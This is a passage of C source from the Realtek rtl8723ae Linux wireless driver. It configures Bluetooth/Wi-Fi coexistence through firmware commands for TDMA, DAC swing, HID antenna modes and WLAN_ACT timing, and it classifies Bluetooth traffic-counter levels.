btdm8723.val_0x6c0 = 0x5a5aaaaa;
btdm8723.val_0x6c8 = 0xcccc;
btdm8723.val_0x6cc = 0x3;
btdm8723.tdma_on = false;
btdm8723.tdma_dac_swing = TDMA_DAC_SWING_OFF;
btdm8723.b2_ant_hid_en = false;
common = true;
} else if (rtlpcipriv->bt_coexist.bt_busy) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Bt non-idle!\n");
if (mgnt_link_status_query(hw) == RT_MEDIA_CONNECT) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"Wifi connection exist\n");
common = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"No Wifi connection!\n");
btdm8723.rf_rx_lpf_shrink = true;
btdm8723.low_penalty_rate_adaptive = false;
btdm8723.reject_aggre_pkt = false;
/* sw mechanism */
btdm8723.agc_table_en = false;
btdm8723.adc_back_off_on = false;
btdm8723.sw_dac_swing_on = false;
btdm8723.pta_on = true;
btdm8723.val_0x6c0 = 0x55555555;
btdm8723.val_0x6c8 = 0x0000ffff;
btdm8723.val_0x6cc = 0x3;
btdm8723.tdma_on = false;
btdm8723.tdma_dac_swing = TDMA_DAC_SWING_OFF;
btdm8723.b2_ant_hid_en = false;
common = true;
}
}
if (rtl8723ae_dm_bt_need_to_dec_bt_pwr(hw))
btdm8723.dec_bt_pwr = true;
if (common)
rtlpcipriv->bt_coexist.cstate |= BT_COEX_STATE_BTINFO_COMMON;
if (common && rtl8723ae_dm_bt_is_coexist_state_changed(hw))
rtl8723ae_dm_bt_set_bt_dm(hw, &btdm8723);
return common;
}
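/* Apply or clear the software full-time DAC swing level via
 * BB register 0x880[31:24].
 */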
static void rtl8723ae_dm_bt_set_sw_full_time_dac_swing(struct ieee80211_hw *hw,
bool sw_dac_swing_on,
u32 sw_dac_swing_lvl)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
if (sw_dac_swing_on) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], SwDacSwing = 0x%x\n", sw_dac_swing_lvl);
rtl8723_phy_set_bb_reg(hw, 0x880, 0xff000000,
sw_dac_swing_lvl);
rtlpcipriv->bt_coexist.sw_coexist_all_off = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], SwDacSwing Off!\n");
rtl8723_phy_set_bb_reg(hw, 0x880, 0xff000000, 0xc0);
}
}
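/* Ask firmware to decrease BT Tx power (H2C command 0x21, BIT(1)). */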
static void rtl8723ae_dm_bt_set_fw_dec_bt_pwr(struct ieee80211_hw *hw,
bool dec_bt_pwr)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 h2c_parameter[1] = {0};
h2c_parameter[0] = 0;
if (dec_bt_pwr) {
h2c_parameter[0] |= BIT(1);
rtlpcipriv->bt_coexist.fw_coexist_all_off = false;
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], decrease Bt Power : %s, write 0x21 = 0x%x\n",
(dec_bt_pwr ? "Yes!!" : "No!!"), h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x21, 1, h2c_parameter);
}
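/* Enable/disable the firmware 2-antenna + HID mechanism (H2C command
 * 0x15); BIT(1) keeps DAC swing enabled.
 */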
static void rtl8723ae_dm_bt_set_fw_2_ant_hid(struct ieee80211_hw *hw,
bool enable, bool dac_swing_on)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 h2c_parameter[1] = {0};
if (enable) {
h2c_parameter[0] |= BIT(0);
rtlpcipriv->bt_coexist.fw_coexist_all_off = false;
}
if (dac_swing_on)
h2c_parameter[0] |= BIT(1); /* Dac Swing default enable */
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], turn 2-Ant+HID mode %s, DACSwing:%s, write 0x15 = 0x%x\n",
(enable ? "ON!!" : "OFF!!"), (dac_swing_on ? "ON" : "OFF"),
h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x15, 1, h2c_parameter);
}
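/* Configure the firmware TDMA mechanism: H2C 0x26 triggers a PTA
 * update, H2C 0x14 carries the enable/antenna/NAV/DAC-swing bits.
 */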
static void rtl8723ae_dm_bt_set_fw_tdma_ctrl(struct ieee80211_hw *hw,
bool enable, u8 ant_num, u8 nav_en,
u8 dac_swing_en)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
u8 h2c_parameter[1] = {0};
u8 h2c_parameter1[1] = {0};
h2c_parameter[0] = 0;
h2c_parameter1[0] = 0;
if (enable) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], set BT PTA update manager to trigger update!!\n");
h2c_parameter1[0] |= BIT(0);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], turn TDMA mode ON!!\n");
h2c_parameter[0] |= BIT(0); /* function enable */
if (TDMA_1ANT == ant_num) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TDMA_1ANT\n");
h2c_parameter[0] |= BIT(1);
} else if (TDMA_2ANT == ant_num) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TDMA_2ANT\n");
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], Unknown Ant\n");
}
if (TDMA_NAV_OFF == nav_en) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TDMA_NAV_OFF\n");
} else if (TDMA_NAV_ON == nav_en) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TDMA_NAV_ON\n");
h2c_parameter[0] |= BIT(2);
}
if (TDMA_DAC_SWING_OFF == dac_swing_en) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TDMA_DAC_SWING_OFF\n");
} else if (TDMA_DAC_SWING_ON == dac_swing_en) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TDMA_DAC_SWING_ON\n");
h2c_parameter[0] |= BIT(4);
}
rtlpcipriv->bt_coexist.fw_coexist_all_off = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], set BT PTA update manager to no update!!\n");
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], turn TDMA mode OFF!!\n");
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], FW2AntTDMA, write 0x26 = 0x%x\n",
h2c_parameter1[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x26, 1, h2c_parameter1);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], FW2AntTDMA, write 0x14 = 0x%x\n", h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x14, 1, h2c_parameter);
}
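/* Tell firmware whether BT should ignore the WLAN_ACT signal
 * (H2C command 0x25).
 */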
static void rtl8723ae_dm_bt_set_fw_ignore_wlan_act(struct ieee80211_hw *hw,
bool enable)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
u8 h2c_parameter[1] = {0};
if (enable) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], BT Ignore Wlan_Act !!\n");
h2c_parameter[0] |= BIT(0); /* function enable */
rtlpcipriv->bt_coexist.fw_coexist_all_off = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], BT don't ignore Wlan_Act !!\n");
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], set FW for BT Ignore Wlan_Act, write 0x25 = 0x%x\n",
h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x25, 1, h2c_parameter);
}
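/* Configure the firmware "traditional" TDMA mechanism (H2C command
 * 0x33); skipped on 8723 A-cut parts.
 */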
static void rtl8723ae_dm_bt_set_fw_tra_tdma_ctrl(struct ieee80211_hw *hw,
bool enable, u8 ant_num,
u8 nav_en)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtl_priv(hw));
u8 h2c_parameter[2] = {0};
/* Only 8723 B cut should do this */
if (IS_VENDOR_8723_A_CUT(rtlhal->version)) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], not 8723B cut, don't set Traditional TDMA!!\n");
return;
}
if (enable) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], turn TTDMA mode ON!!\n");
h2c_parameter[0] |= BIT(0); /* function enable */
if (TDMA_1ANT == ant_num) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TTDMA_1ANT\n");
h2c_parameter[0] |= BIT(1);
} else if (TDMA_2ANT == ant_num) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TTDMA_2ANT\n");
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], Unknown Ant\n");
}
if (TDMA_NAV_OFF == nav_en) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TTDMA_NAV_OFF\n");
} else if (TDMA_NAV_ON == nav_en) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], TTDMA_NAV_ON\n");
h2c_parameter[1] |= BIT(0);
}
rtlpcipriv->bt_coexist.fw_coexist_all_off = false;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], turn TTDMA mode OFF!!\n");
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], FW Traditional TDMA, write 0x33 = 0x%x\n",
h2c_parameter[0] << 8 | h2c_parameter[1]);
rtl8723ae_fill_h2c_cmd(hw, 0x33, 2, h2c_parameter);
}
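/* Set the firmware-controlled DAC swing level (H2C command 0x29). */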
static void rtl8723ae_dm_bt_set_fw_dac_swing_level(struct ieee80211_hw *hw,
u8 dac_swing_lvl)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 h2c_parameter[1] = {0};
h2c_parameter[0] = dac_swing_lvl;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], Set Dac Swing Level = 0x%x\n", dac_swing_lvl);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], write 0x29 = 0x%x\n", h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x29, 1, h2c_parameter);
}
static void rtl8723ae_dm_bt_set_fw_bt_hid_info(struct ieee80211_hw *hw,
bool enable)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 h2c_parameter[1] = {0};
h2c_parameter[0] = 0;
if (enable) {
h2c_parameter[0] |= BIT(0);
rtlpcipriv->bt_coexist.fw_coexist_all_off = false;
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], Set BT HID information = 0x%x\n", enable);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], write 0x24 = 0x%x\n", h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x24, 1, h2c_parameter);
}
static void rtl8723ae_dm_bt_set_fw_bt_retry_index(struct ieee80211_hw *hw,
u8 retry_index)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 h2c_parameter[1] = {0};
h2c_parameter[0] = retry_index;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], Set BT Retry Index=%d\n", retry_index);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], write 0x23 = 0x%x\n", h2c_parameter[0]);
rtl8723ae_fill_h2c_cmd(hw, 0x23, 1, h2c_parameter);
}
static void rtl8723ae_dm_bt_set_fw_wlan_act(struct ieee80211_hw *hw,
u8 wlan_act_hi, u8 wlan_act_lo)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
u8 h2c_parameter_hi[1] = {0};
u8 h2c_parameter_lo[1] = {0};
h2c_parameter_hi[0] = wlan_act_hi;
h2c_parameter_lo[0] = wlan_act_lo;
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], Set WLAN_ACT Hi:Lo = 0x%x/0x%x\n", wlan_act_hi,
wlan_act_lo);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], write 0x22 = 0x%x\n", h2c_parameter_hi[0]);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], write 0x11 = 0x%x\n", h2c_parameter_lo[0]);
/* WLAN_ACT = High duration, unit:ms */
rtl8723ae_fill_h2c_cmd(hw, 0x22, 1, h2c_parameter_hi);
/* WLAN_ACT = Low duration, unit:3*625us */
rtl8723ae_fill_h2c_cmd(hw, 0x11, 1, h2c_parameter_lo);
}
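/* Apply a complete btdm_8723 coexistence setting: compare it with the
 * currently stored one, log any differences, then program the sw/hw/fw
 * mechanisms accordingly.
 */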
void rtl8723ae_dm_bt_set_bt_dm(struct ieee80211_hw *hw, struct btdm_8723 *btdm)
{
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_hal *rtlhal = rtl_hal(rtlpriv);
struct btdm_8723 *btdm_8723 = &rtlhal->hal_coex_8723.btdm;
u8 i;
bool fw_current_inpsmode = false;
bool fw_ps_awake = true;
rtlpriv->cfg->ops->get_hw_reg(hw, HW_VAR_FW_PSMODE_STATUS,
(u8 *)(&fw_current_inpsmode));
rtlpriv->cfg->ops->get_hw_reg(hw, HW_VAR_FWLPS_RF_ON,
(u8 *)(&fw_ps_awake));
/* Check whether the new setting differs from the old one;
 * if they are identical, don't apply the setting again.
 */
if (memcmp(btdm_8723, btdm, sizeof(struct btdm_8723)) == 0) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], the same coexist setting, return!!\n");
return;
} else { /* save the new coexist setting */
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], UPDATE TO NEW COEX SETTING!!\n");
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bAllOff = 0x%x/ 0x%x\n",
btdm_8723->all_off, btdm->all_off);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new agc_table_en = 0x%x/ 0x%x\n",
btdm_8723->agc_table_en, btdm->agc_table_en);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new adc_back_off_on = 0x%x/ 0x%x\n",
btdm_8723->adc_back_off_on, btdm->adc_back_off_on);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new b2_ant_hid_en = 0x%x/ 0x%x\n",
btdm_8723->b2_ant_hid_en, btdm->b2_ant_hid_en);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bLowPenaltyRateAdaptive = 0x%x/ 0x%x\n",
btdm_8723->low_penalty_rate_adaptive,
btdm->low_penalty_rate_adaptive);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bRfRxLpfShrink = 0x%x/ 0x%x\n",
btdm_8723->rf_rx_lpf_shrink, btdm->rf_rx_lpf_shrink);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bRejectAggrePkt = 0x%x/ 0x%x\n",
btdm_8723->reject_aggre_pkt, btdm->reject_aggre_pkt);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new tdma_on = 0x%x/ 0x%x\n",
btdm_8723->tdma_on, btdm->tdma_on);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new tdmaAnt = 0x%x/ 0x%x\n",
btdm_8723->tdma_ant, btdm->tdma_ant);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new tdmaNav = 0x%x/ 0x%x\n",
btdm_8723->tdma_nav, btdm->tdma_nav);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new tdma_dac_swing = 0x%x/ 0x%x\n",
btdm_8723->tdma_dac_swing, btdm->tdma_dac_swing);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new fwDacSwingLvl = 0x%x/ 0x%x\n",
btdm_8723->fw_dac_swing_lvl, btdm->fw_dac_swing_lvl);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bTraTdmaOn = 0x%x/ 0x%x\n",
btdm_8723->tra_tdma_on, btdm->tra_tdma_on);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new traTdmaAnt = 0x%x/ 0x%x\n",
btdm_8723->tra_tdma_ant, btdm->tra_tdma_ant);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new traTdmaNav = 0x%x/ 0x%x\n",
btdm_8723->tra_tdma_nav, btdm->tra_tdma_nav);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bPsTdmaOn = 0x%x/ 0x%x\n",
btdm_8723->ps_tdma_on, btdm->ps_tdma_on);
for (i = 0; i < 5; i++) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new psTdmaByte[i] = 0x%x/ 0x%x\n",
btdm_8723->ps_tdma_byte[i],
btdm->ps_tdma_byte[i]);
}
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bIgnoreWlanAct = 0x%x/ 0x%x\n",
btdm_8723->ignore_wlan_act, btdm->ignore_wlan_act);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new bPtaOn = 0x%x/ 0x%x\n",
btdm_8723->pta_on, btdm->pta_on);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new val_0x6c0 = 0x%x/ 0x%x\n",
btdm_8723->val_0x6c0, btdm->val_0x6c0);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new val_0x6c8 = 0x%x/ 0x%x\n",
btdm_8723->val_0x6c8, btdm->val_0x6c8);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new val_0x6cc = 0x%x/ 0x%x\n",
btdm_8723->val_0x6cc, btdm->val_0x6cc);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new sw_dac_swing_on = 0x%x/ 0x%x\n",
btdm_8723->sw_dac_swing_on, btdm->sw_dac_swing_on);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new sw_dac_swing_lvl = 0x%x/ 0x%x\n",
btdm_8723->sw_dac_swing_lvl,
btdm->sw_dac_swing_lvl);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new wlanActHi = 0x%x/ 0x%x\n",
btdm_8723->wlan_act_hi, btdm->wlan_act_hi);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new wlanActLo = 0x%x/ 0x%x\n",
btdm_8723->wlan_act_lo, btdm->wlan_act_lo);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], original/new btRetryIndex = 0x%x/ 0x%x\n",
btdm_8723->bt_retry_index, btdm->bt_retry_index);
memcpy(btdm_8723, btdm, sizeof(struct btdm_8723));
}
/*
 * Here we only consider the case when a BT operation
 * (inquiry/paging/pairing) is ongoing; in that case
 * we only need to turn off TDMA.
 */
if (rtlpcipriv->bt_coexist.hold_for_bt_operation) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], set to ignore wlanAct for BT OP!!\n");
rtl8723ae_dm_bt_set_fw_ignore_wlan_act(hw, true);
return;
}
if (btdm->all_off) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_TRACE,
"[BTCoex], disable all coexist mechanism !!\n");
rtl8723ae_btdm_coex_all_off(hw);
return;
}
rtl8723ae_dm_bt_reject_ap_aggregated_packet(hw, btdm->reject_aggre_pkt);
if (btdm->low_penalty_rate_adaptive)
rtl8723ae_bt_set_penalty_tx_rate_adap(hw,
BT_TX_RATE_ADAPTIVE_LOW_PENALTY);
else
rtl8723ae_bt_set_penalty_tx_rate_adap(hw,
BT_TX_RATE_ADAPTIVE_NORMAL);
if (btdm->rf_rx_lpf_shrink)
rtl8723ae_dm_bt_set_sw_rf_rx_lpf_corner(hw,
BT_RF_RX_LPF_CORNER_SHRINK);
else
rtl8723ae_dm_bt_set_sw_rf_rx_lpf_corner(hw,
BT_RF_RX_LPF_CORNER_RESUME);
if (btdm->agc_table_en)
rtl8723ae_dm_bt_agc_table(hw, BT_AGCTABLE_ON);
else
rtl8723ae_dm_bt_agc_table(hw, BT_AGCTABLE_OFF);
if (btdm->adc_back_off_on)
rtl8723ae_dm_bt_bback_off_level(hw, BT_BB_BACKOFF_ON);
else
rtl8723ae_dm_bt_bback_off_level(hw, BT_BB_BACKOFF_OFF);
rtl8723ae_dm_bt_set_fw_bt_retry_index(hw, btdm->bt_retry_index);
rtl8723ae_dm_bt_set_fw_dac_swing_level(hw, btdm->fw_dac_swing_lvl);
rtl8723ae_dm_bt_set_fw_wlan_act(hw, btdm->wlan_act_hi,
btdm->wlan_act_lo);
rtl8723ae_dm_bt_set_coex_table(hw, btdm->val_0x6c0,
btdm->val_0x6c8, btdm->val_0x6cc);
rtl8723ae_dm_bt_set_hw_pta_mode(hw, btdm->pta_on);
/* Note: There is a constraint between TDMA and 2AntHID.
 * Only one of 2AntHid and tdma can be turned on at a time;
 * we turn off the other mechanisms first
 * and then turn on the selected one.
 */
if (btdm->b2_ant_hid_en) {
/* turn off tdma */
rtl8723ae_dm_bt_set_fw_tra_tdma_ctrl(hw, btdm->tra_tdma_on,
btdm->tra_tdma_ant,
btdm->tra_tdma_nav);
rtl8723ae_dm_bt_set_fw_tdma_ctrl(hw, false, btdm->tdma_ant,
btdm->tdma_nav,
btdm->tdma_dac_swing);
/* turn off Pstdma */
rtl8723ae_dm_bt_set_fw_ignore_wlan_act(hw,
btdm->ignore_wlan_act);
/* Antenna control by PTA, 0x870 = 0x300. */
rtl8723ae_dm_bt_set_fw_3a(hw, 0x0, 0x0, 0x0, 0x8, 0x0);
/* turn on 2AntHid */
rtl8723ae_dm_bt_set_fw_bt_hid_info(hw, true);
rtl8723ae_dm_bt_set_fw_2_ant_hid(hw, true, true);
} else if (btdm->tdma_on) {
/* turn off 2AntHid */
rtl8723ae_dm_bt_set_fw_bt_hid_info(hw, false);
rtl8723ae_dm_bt_set_fw_2_ant_hid(hw, false, false);
/* turn off pstdma */
rtl8723ae_dm_bt_set_fw_ignore_wlan_act(hw,
btdm->ignore_wlan_act);
/* Antenna control by PTA, 0x870 = 0x300. */
rtl8723ae_dm_bt_set_fw_3a(hw, 0x0, 0x0, 0x0, 0x8, 0x0);
/* turn on tdma */
rtl8723ae_dm_bt_set_fw_tra_tdma_ctrl(hw, btdm->tra_tdma_on,
btdm->tra_tdma_ant, btdm->tra_tdma_nav);
rtl8723ae_dm_bt_set_fw_tdma_ctrl(hw, true, btdm->tdma_ant,
btdm->tdma_nav, btdm->tdma_dac_swing);
} else if (btdm->ps_tdma_on) {
/* turn off 2AntHid */
rtl8723ae_dm_bt_set_fw_bt_hid_info(hw, false);
rtl8723ae_dm_bt_set_fw_2_ant_hid(hw, false, false);
/* turn off tdma */
rtl8723ae_dm_bt_set_fw_tra_tdma_ctrl(hw, btdm->tra_tdma_on,
btdm->tra_tdma_ant, btdm->tra_tdma_nav);
rtl8723ae_dm_bt_set_fw_tdma_ctrl(hw, false, btdm->tdma_ant,
btdm->tdma_nav, btdm->tdma_dac_swing);
/* turn on pstdma */
rtl8723ae_dm_bt_set_fw_ignore_wlan_act(hw,
btdm->ignore_wlan_act);
rtl8723ae_dm_bt_set_fw_3a(hw,
btdm->ps_tdma_byte[0],
btdm->ps_tdma_byte[1],
btdm->ps_tdma_byte[2],
btdm->ps_tdma_byte[3],
btdm->ps_tdma_byte[4]);
} else {
/* turn off 2AntHid */
rtl8723ae_dm_bt_set_fw_bt_hid_info(hw, false);
rtl8723ae_dm_bt_set_fw_2_ant_hid(hw, false, false);
/* turn off tdma */
rtl8723ae_dm_bt_set_fw_tra_tdma_ctrl(hw, btdm->tra_tdma_on,
btdm->tra_tdma_ant, btdm->tra_tdma_nav);
rtl8723ae_dm_bt_set_fw_tdma_ctrl(hw, false, btdm->tdma_ant,
btdm->tdma_nav, btdm->tdma_dac_swing);
/* turn off pstdma */
rtl8723ae_dm_bt_set_fw_ignore_wlan_act(hw,
btdm->ignore_wlan_act);
/* Antenna control by PTA, 0x870 = 0x300. */
rtl8723ae_dm_bt_set_fw_3a(hw, 0x0, 0x0, 0x0, 0x8, 0x0);
}
/* Note:
 * Add a delay to make sure the sw DacSwing can be set
 * successfully, because rtl8723ae_dm_bt_set_fw_2_ant_hid()
 * and rtl8723ae_dm_bt_set_fw_tdma_ctrl()
 * overwrite reg 0x880.
 */
mdelay(30);
rtl8723ae_dm_bt_set_sw_full_time_dac_swing(hw,
btdm->sw_dac_swing_on, btdm->sw_dac_swing_lvl);
rtl8723ae_dm_bt_set_fw_dec_bt_pwr(hw, btdm->dec_bt_pwr);
}
/*============================================================
* extern function start with BTDM_
*============================================================
*/
static u32 rtl8723ae_dm_bt_tx_rx_couter_h(struct ieee80211_hw *hw)
{
struct rtl_hal *rtlhal = rtl_hal(rtl_priv(hw));
u32 counters = 0;
counters = rtlhal->hal_coex_8723.high_priority_tx +
rtlhal->hal_coex_8723.high_priority_rx;
return counters;
}
static u32 rtl8723ae_dm_bt_tx_rx_couter_l(struct ieee80211_hw *hw)
{
struct rtl_hal *rtlhal = rtl_hal(rtl_priv(hw));
return rtlhal->hal_coex_8723.low_priority_tx +
rtlhal->hal_coex_8723.low_priority_rx;
}
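/* Classify the summed BT Tx/Rx counters into level 0..3 and record
 * the level in the coexistence state bitmap.
 */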
static u8 rtl8723ae_dm_bt_bt_tx_rx_counter_level(struct ieee80211_hw *hw)
{
struct rtl_priv *rtlpriv = rtl_priv(hw);
struct rtl_pci_priv *rtlpcipriv = rtl_pcipriv(hw);
u32 bt_tx_rx_cnt = 0;
u8 bt_tx_rx_cnt_lvl = 0;
bt_tx_rx_cnt = rtl8723ae_dm_bt_tx_rx_couter_h(hw) +
rtl8723ae_dm_bt_tx_rx_couter_l(hw);
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters = %d\n", bt_tx_rx_cnt);
rtlpcipriv->bt_coexist.cstate_h &=
~(BT_COEX_STATE_BT_CNT_LEVEL_0 | BT_COEX_STATE_BT_CNT_LEVEL_1 |
BT_COEX_STATE_BT_CNT_LEVEL_2);
if (bt_tx_rx_cnt >= BT_TXRX_CNT_THRES_3) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters at level 3\n");
bt_tx_rx_cnt_lvl = BT_TXRX_CNT_LEVEL_3;
rtlpcipriv->bt_coexist.cstate_h |= BT_COEX_STATE_BT_CNT_LEVEL_3;
} else if (bt_tx_rx_cnt >= BT_TXRX_CNT_THRES_2) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters at level 2\n");
bt_tx_rx_cnt_lvl = BT_TXRX_CNT_LEVEL_2;
rtlpcipriv->bt_coexist.cstate_h |= BT_COEX_STATE_BT_CNT_LEVEL_2;
} else if (bt_tx_rx_cnt >= BT_TXRX_CNT_THRES_1) {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters at level 1\n");
bt_tx_rx_cnt_lvl = BT_TXRX_CNT_LEVEL_1;
rtlpcipriv->bt_coexist.cstate_h |= BT_COEX_STATE_BT_CNT_LEVEL_1;
} else {
RT_TRACE(rtlpriv, COMP_BT_COEXIST, DBG_DMESG,
"[BTCoex], BT TxRx Counters at level 0\n");
bt_tx_rx_cnt_lvl = BT_TXRX_CNT_LEVEL_0;
rtlpcipriv->bt_coexist.cstate_h |= BT_COEX_STATE_BT_CNT_LEVEL_0;
}
return bt_tx_rx_cnt_lvl;
}
